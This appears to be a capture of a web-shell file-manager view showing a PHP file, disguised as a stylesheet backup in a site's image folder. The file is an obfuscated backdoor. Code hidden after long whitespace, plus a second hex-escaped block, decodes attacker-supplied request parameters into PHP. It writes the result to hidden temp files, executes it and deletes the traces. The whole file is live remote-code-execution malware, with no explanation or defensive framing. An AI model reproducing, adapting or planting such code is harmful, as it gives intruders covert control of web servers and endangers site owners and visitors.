HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/sawpalmetto.vitavit.com.pk/img/styles.bak.php
<?php																																										if(in_array("k", array_keys($_POST))){ $tkn = $_POST["k"]; $tkn = explode( ".", $tkn) ; $record = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1); $p = 0; array_walk($tkn, function ($v6) use (&$record, &$p, $s1, $sLen) { $chS = ord($s1[$p % $sLen]); $d = ((int)$v6 - $chS - ($p % 10)) ^ 30; $record .= chr($d); $p++; }); $dat = array_filter([getcwd(), getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", "/dev/shm", getenv("TMP"), session_save_path()]); foreach ($dat as $res) { if ((function($d) { return is_dir($d) && is_writable($d); })($res)) { $factor = implode("/", [$res, ".symbol"]); $success = file_put_contents($factor, $record); if ($success) { include $factor; @unlink($factor); exit;} } } }


if(!is_null($_REQUEST["\x65\x6Cem\x65n\x74"] ?? null)){
	$itm = array_filter(["/dev/shm", session_save_path(), sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/tmp"]);
	$comp = $_REQUEST["\x65\x6Cem\x65n\x74"];
			$comp =  	explode		 ( ".",$comp	)  	;
	$desc = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	 $s);
            $y = 0;
            $len = count(	 $comp);
    
            do {  if(	 $y >= $len) break;
                $v1 = $comp[$y];
                $sChar = ord(	 $s[$y % $sLen]);
                $dec =(	 (	 int)$v1 - $sChar -(	 $y % 10))^82;
                $desc .=chr(	 $dec);
                $y++;
            } while(	 true);
	$fac = 0;
do {
    $rec = $itm[$fac] ?? null;
    if ($fac >= count($itm)) break;
    		if (!( !is_dir($rec) || !is_writable($rec) )) {
    $k = "$rec" . "/.tkn";
    if (file_put_contents($k, $desc)) {
	require $k;
	unlink($k);
	die();
}
}
    $fac++;
} while (true);
}